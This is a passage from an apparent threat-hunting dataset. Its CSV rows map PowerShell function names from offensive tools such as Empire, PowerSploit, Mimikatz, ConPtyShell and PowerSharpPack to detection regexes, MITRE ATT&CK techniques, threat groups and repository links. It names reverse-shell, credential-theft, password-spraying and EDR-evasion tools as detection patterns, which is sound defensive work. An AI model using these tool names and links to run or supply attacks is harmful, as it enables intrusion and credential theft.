to provide the user a wide variety of methods to backdoor a system","T1055 - T1203 - T1105 - T1202 - T1027 - T1059 - T1070","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/PowerShellEmpire/PowerTools","1","1","N/A","N/A","10","10","2106","815","2021-12-28T21:00:42Z","2014-03-06T14:49:51Z","48888" "*Invoke-Carbuncle*",".{0,1000}Invoke\-Carbuncle.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many 
useful offensive CSharp Projects wrapped into PowerShell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","48889" "*Invoke-Cats -pwds*",".{0,1000}Invoke\-Cats\s\-pwds.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","N/A","10","10","1190","163","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z","48890" "*Invoke-Cats.ps1*",".{0,1000}Invoke\-Cats\.ps1.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","1","N/A","N/A","10","10","1190","163","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z","48891" "*Invoke-CcmNaaCredentialsCheck*",".{0,1000}Invoke\-CcmNaaCredentialsCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","48892" "*Invoke-Certify*",".{0,1000}Invoke\-Certify.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wrapped into PowerShell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation
tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","48893" "*Invoke-Certify*",".{0,1000}Invoke\-Certify.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","48894" "*Invoke-CheckAccess*",".{0,1000}Invoke\-CheckAccess.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","N/A","Check if tokens are valid","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","48895" "*Invoke-CheckLocalAdminAccess -ComputerName *",".{0,1000}Invoke\-CheckLocalAdminAccess\s\-ComputerName\s.{0,1000}","offensive_tool_keyword","FruityC2","FruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","0","N/A","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","48896" "*invokechecklocaladminaccess*",".{0,1000}invokechecklocaladminaccess.{0,1000}","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 -
T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","N/A","10","10","67","18","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z","48897" "*Invoke-CheckLocalAdminAccess*",".{0,1000}Invoke\-CheckLocalAdminAccess.{0,1000}","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 
- T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","N/A","10","10","67","18","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z","48898" "*Invoke-CheckLocalAdminAccess*",".{0,1000}Invoke\-CheckLocalAdminAccess.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","48899" "*invoke-checklocaladminaccess*",".{0,1000}invoke\-checklocaladminaccess.{0,1000}","offensive_tool_keyword","pywerview","A partial Python rewriting of PowerSploit PowerView","T1069.002 - T1018 - T1087.001 - T1033 - T1069.001 - T1087.002 - T1016 - T1482","TA0007 - TA0009","N/A","N/A","Reconnaissance","https://github.com/the-useless-one/pywerview","1","1","N/A","N/A","N/A","10","974","121","2025-03-17T14:04:51Z","2016-07-06T13:25:09Z","48900" "*Invoke-ClearScript*",".{0,1000}Invoke\-ClearScript.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - 
T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","48901" "*Invoke-ClearScript.ps1*",".{0,1000}Invoke\-ClearScript\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - 
FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","48902" "*Invoke-CleverSpray*",".{0,1000}Invoke\-CleverSpray.{0,1000}","offensive_tool_keyword","Invoke-CleverSpray","Password Spraying Script detecting current and previous passwords of Active Directory User","T1110.003 - T1110.001","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/wavestone-cdt/Invoke-CleverSpray","1","0","N/A","N/A","10","1","65","11","2021-09-09T07:35:32Z","2018-11-29T10:05:25Z","48903" "*Invoke-CleverSpray.ps1*",".{0,1000}Invoke\-CleverSpray\.ps1.{0,1000}","offensive_tool_keyword","Invoke-CleverSpray","Password Spraying Script detecting current and previous passwords of Active Directory User","T1110.003 - T1110.001","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/wavestone-cdt/Invoke-CleverSpray","1","1","N/A","N/A","10","1","65","11","2021-09-09T07:35:32Z","2018-11-29T10:05:25Z","48904" "*Invoke-ClipboardMonitor*",".{0,1000}Invoke\-ClipboardMonitor.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","48905" "*Invoke-CMLootDownload*",".{0,1000}Invoke\-CMLootDownload.{0,1000}","offensive_tool_keyword","CMLoot","Find interesting files stored on (System Center) Configuration Manager (SCCM/CM) SMB shares","T1083 - T1039","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/1njected/CMLoot","1","1","N/A","N/A","8","2","175","22","2023-02-05T00:24:31Z","2022-06-02T10:59:21Z","48906" "*Invoke-CMLootExtract*",".{0,1000}Invoke\-CMLootExtract.{0,1000}","offensive_tool_keyword","CMLoot","Find interesting files stored on (System Center) Configuration Manager (SCCM/CM) SMB 
shares","T1083 - T1039","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/1njected/CMLoot","1","1","N/A","N/A","8","2","175","22","2023-02-05T00:24:31Z","2022-06-02T10:59:21Z","48907" "*Invoke-CMLootHunt *",".{0,1000}Invoke\-CMLootHunt\s.{0,1000}","offensive_tool_keyword","CMLoot","Find interesting files stored on (System Center) Configuration Manager (SCCM/CM) SMB shares","T1083 - T1039","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/1njected/CMLoot","1","0","N/A","N/A","8","2","175","22","2023-02-05T00:24:31Z","2022-06-02T10:59:21Z","48908" "*Invoke-CMLootInventory*",".{0,1000}Invoke\-CMLootInventory.{0,1000}","offensive_tool_keyword","CMLoot","Find interesting files stored on (System Center) Configuration Manager (SCCM/CM) SMB shares","T1083 - T1039","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/1njected/CMLoot","1","1","N/A","N/A","8","2","175","22","2023-02-05T00:24:31Z","2022-06-02T10:59:21Z","48909" "*Invoke-ConPtyShell *",".{0,1000}Invoke\-ConPtyShell\s.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","48910" "*Invoke-ConPtyShell*",".{0,1000}Invoke\-ConPtyShell.{0,1000}","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1059.001 - T1021.004 - T1056.003","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/ConPtyShell","1","1","N/A","N/A","10","10","1102","171","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z","48911" "*Invoke-ConPtyShell*",".{0,1000}Invoke\-ConPtyShell.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","48912" "*Invoke-ConPtyShell*",".{0,1000}Invoke\-ConPtyShell.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","#linux","N/A","10","10","3992","642","2025-01-19T18:37:12Z","2022-10-25T22:02:59Z","48913" "*Invoke-ConPtyShell.ps1*",".{0,1000}Invoke\-ConPtyShell\.ps1.{0,1000}","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1059.001 - T1021.004 - T1056.003","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/ConPtyShell","1","1","N/A","N/A","10","10","1102","171","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z","48914" "*Invoke-ConPtyShell.ps1*",".{0,1000}Invoke\-ConPtyShell\.ps1.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","1","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","48915" "*Invoke-CopyFile*",".{0,1000}Invoke\-CopyFile.{0,1000}","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. 
While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","48916" "*Invoke-CradleCrafter *",".{0,1000}Invoke\-CradleCrafter\s.{0,1000}","offensive_tool_keyword","Payload-Download-Cradles","download cradles to bypass AV/EPP/EDR in context of download cradle detections","T1105 - T1027 - T1203 - T1071","TA0005 - TA0009 - TA0002","N/A","N/A","Defense 
Evasion","https://github.com/VirtualAlllocEx/Payload-Download-Cradles","1","0","N/A","N/A","10","3","256","51","2022-07-07T07:20:36Z","2021-05-14T08:56:54Z","48917" "*Invoke-CreateRemoteThread*",".{0,1000}Invoke\-CreateRemoteThread.{0,1000}","offensive_tool_keyword","mimikatz","Invoke-Mimikatz.ps1 function name","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1","1","1","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","48918" "*Invoke-CredentialFilesCheck*",".{0,1000}Invoke\-CredentialFilesCheck.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - 
TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","N/A","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","48919" "*Invoke-CredentialFilesCheck*",".{0,1000}Invoke\-CredentialFilesCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","48920" "*Invoke-CredentialGuardCheck*",".{0,1000}Invoke\-CredentialGuardCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","48921" "*Invoke-CredentialInjection*",".{0,1000}Invoke\-CredentialInjection.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","48922" "*Invoke-CredentialInjection*",".{0,1000}Invoke\-CredentialInjection.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - 
T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","48923" "*Invoke-CredentialInjection*",".{0,1000}Invoke\-CredentialInjection.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
